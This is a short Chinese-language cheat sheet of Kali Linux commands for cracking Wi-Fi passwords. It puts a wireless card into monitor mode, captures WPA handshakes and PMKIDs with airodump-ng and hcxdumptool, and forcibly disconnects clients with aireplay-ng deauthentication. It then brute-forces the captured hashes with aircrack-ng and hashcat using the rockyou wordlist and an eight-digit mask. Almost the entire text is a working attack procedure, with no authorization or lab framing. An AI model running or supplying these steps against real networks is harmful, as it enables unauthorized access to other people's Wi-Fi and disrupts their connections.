wifi工具使用
1.aircrack-ng
iwconfig #查看无线网卡
sudo airmon-ng #查看网卡是否支持监听模式
sudo airmon-ng check kill #结束系统中可能的干扰进程
sudo airmon-ng start wlan0 #开启监听模式
sudo airodump-ng wlan0mon #监听周围WIFI状态
sudo airodump-ng -c CH值 --bssid MAC值 -w 保存文件名 wlan0mon #抓取握手包
sudo aireplay-ng -0 2 -c 客户MAC值 -a MAC值 wlan0mon #强断
sudo aircrack-ng -w 字典名 .cap文件名
gzip -d /usr/share/wordlists/rockyou.txt.gz #解压kali自带的rockyou字典
airodump-ng --band abg wlan0 扫描5g和2.4g
airodump-ng -c 161信道 --bssid AP_MAC值 --ivszufang保存文件名称 wlan0
aireplay-ng -0 2 -c xx:xx:xx:xx:xx:xx(客户端mac 不写此选项默认所有客户端) -a AP_MAC值 wlan0 -D
1.1 抓到的包转hashcat爆破
aircrack-ng out.cap -j out # 转换hccapx
hashcat -m 2500 testap.hccapx pass.txt # 爆破
环境: kali
网卡: 磊科(netcore)NW392千兆5G双频USB无线网卡
1. 网卡驱动安装(rtl8812au驱动安装) apt-get update && apt install realtek-rtl88xxau-dkms
2. 命令如下
sudo systemctl stop NetworkManager.service //关闭网络服务
sudo systemctl stop wpa_supplicant.service
airmon-ng stop wlan0 && airmon-ng start wlan0
hcxdumptool -i wlan0 -o Hackers-ArisePMKID --enable_status=1
3. 抓包结束
sudo systemctl start wpa_supplicant.service //恢复网络服务
sudo systemctl start NetworkManager.service
hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng //导出hashcat识别的爆破文件
4. hashcat -m 22000 hash.hc22000 wordlist.txt -o find_pwd.txt(找到的密码输出)
hashcat.exe -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d